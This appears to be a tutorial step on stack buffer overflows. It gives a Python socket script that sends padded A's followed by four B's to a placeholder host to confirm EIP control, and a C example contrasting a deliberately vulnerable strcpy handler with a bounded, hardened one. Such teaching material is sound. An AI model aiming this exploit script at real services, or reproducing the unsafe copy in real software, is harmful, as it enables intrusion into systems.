Overwriting the EIP

Edit script.py with the offset location found in the last step, append BBBB after the A's, and run it again. If the offset is correct, the debugger shows EIP as 42424242 (the four B bytes).

```python
import socket
import sys

username = "test"

# Replace <offset location> with the offset found in the previous step.
# The four "B" bytes (0x42) that follow the padding are what should land
# in EIP; EIP reading 42424242 in the debugger confirms the offset.
message = "A" * <offset location> + "B" * 4

try:
    print("Sending payload...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('<ip>', <port>))
    s.recv(1024)
    # Python 3 sockets send bytes, so encode the strings before sending.
    s.send((username + '\r\n').encode())
    s.recv(1024)
    s.send((message + '\r\n').encode())
    s.recv(1024)
    s.close()
except socket.error:
    print("Cannot connect to the server")
    sys.exit()
```
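Why the four B's end up in EIP, as an added example that is not part of the original page: a C handler with a fixed-size stack buffer and an unbounded copy, shown beside a bounded version that rejects oversized input before copying. The buffer size, the function names and the payload builder are assumptions for illustration; the real offset is whatever the previous step measured.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Hypothetical buffer size for illustration only. */
#define MSG_BUF 256

/* Vulnerable pattern: strcpy copies until the NUL byte, so a message
 * longer than MSG_BUF overwrites the saved frame pointer and return
 * address on the stack. When the function returns, the bytes sitting
 * at the offset are popped into EIP, which is why the debugger shows
 * 42424242 after a payload of "A" * offset + "B" * 4.
 * Shown for contrast; never called by the checks below. */
void handle_message_unsafe(const char *msg) {
    char buf[MSG_BUF];
    strcpy(buf, msg);          /* no length check */
    printf("got %zu bytes\n", strlen(buf));
}

/* Bounded length measurement: never reads past 'cap' bytes. */
static size_t bounded_len(const char *s, size_t cap) {
    size_t n = 0;
    while (n < cap && s[n] != '\0') n++;
    return n;
}

/* Hardened version: measure with a bound, reject anything that does not
 * fit together with its terminating NUL, and only then copy.
 * Returns false when the message is rejected. */
bool handle_message_safe(const char *msg) {
    char buf[MSG_BUF];
    size_t len = bounded_len(msg, MSG_BUF);
    if (len >= MSG_BUF) {
        return false;          /* oversized: reject without copying */
    }
    memcpy(buf, msg, len + 1);
    printf("got %zu bytes\n", len);
    return true;
}

/* Constructed input mirroring the script above: 'offset' A's followed
 * by four B's. Returns the payload length, or 0 if 'cap' is too small. */
size_t build_payload(char *out, size_t cap, size_t offset) {
    if (offset + 4 + 1 > cap) return 0;
    memset(out, 'A', offset);
    memset(out + offset, 'B', 4);
    out[offset + 4] = '\0';
    return offset + 4;
}

int main(void) {
    char payload[1024];
    size_t n = build_payload(payload, sizeof payload, 300); /* assumed offset */
    printf("payload length %zu, accepted=%d\n", n,
           (int)handle_message_safe(payload));
    return 0;
}
```

The safe handler's check is `len >= MSG_BUF`, not `>`: a message of exactly MSG_BUF characters still needs one more byte for the NUL, so it must be rejected too.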